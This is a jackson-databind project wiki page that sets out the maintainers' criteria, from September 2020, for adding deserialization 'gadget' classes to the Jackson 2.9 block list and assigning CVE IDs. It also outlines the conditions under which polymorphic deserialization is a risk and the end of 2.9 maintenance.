-
-
Notifications
You must be signed in to change notification settings - Fork 1.2k
Jackson Polymorphic Deserialization CVE Criteria
This page outlines the criteria used for accepting problem described "On Jackson CVEs: Don't Panic!" -- that of possible security problems if:
- Service accepts JSON content from untrusted senders AND
- Service enables "Default Typing" feature (or uses equivalent
@JsonTypeInfo
with base type ofjava.lang.Object
) AND - Service has one of 3rd libraries with "gadget" Java classes AND
- Jackson version is 2.9.x or lower
then there may be a security issue.
When such issues are reported, new checks have been added to Jackson versions 2.9 (later versions have separate prevention mechanism that does not rely on blocks) to prevent deserialization of these reported "gadget" types.
Originally reports covered widely-used Java libraries (like EHCache or Spring Web or Hibernate) and there were even one or two types found were include in (some versions of) JDK. These could be expected to be security vulnerabilities for multiple projects and as such worth blocking.
But maintaining these blocks and handling CVE id request, allocation and version releases has its cost -- and because Jackson 2.10 and later are not considered vulnerable in same sense, over time effort to keep adding to the block list has exceeded value for maintainers. For context, the current block list (Jackson-databind 2.9.10.6) contains about 90 specific classes across 30-40 libraries.
Starting on September 15, 2020, new blocks will only be added (and CVE ID allocated) for "gadget" types that are "Notable", which means inclusion in either:
- JDK version 1.8 (Java 8) or later (all valid types accepted, blocks added)
- Publicly available, "popular enough" artifact:
- Must be listed on MvnRepository.com
- Is depended on by at least 20 libraries (not including other components of the same framework, if part of larger set of artifacts)
Some of existing blocks do not fulfill this criteria but blocks that been added previously will not be removed simply due to lack of popularity (or accessibility).
One particular class of no-longer-accepted cases includes that of Application Server classes only available as part of AS installations -- unless they are accessible as artifacts via Maven Central (or similar publicly accessible and indexed Maven repos).
Due to availability of new minor versions (2.10.5 and 2.11.2 available as of Sep 2, 2020), no new releases of Jackson 2.9 are planned to be released, not even micro-patches, after end of 2020. It is always possible that an exception could be made for some critical issue but there are no plans to maintain the block list any further than whatever the last micro patch for 2.9.10 is on December 31, 2020.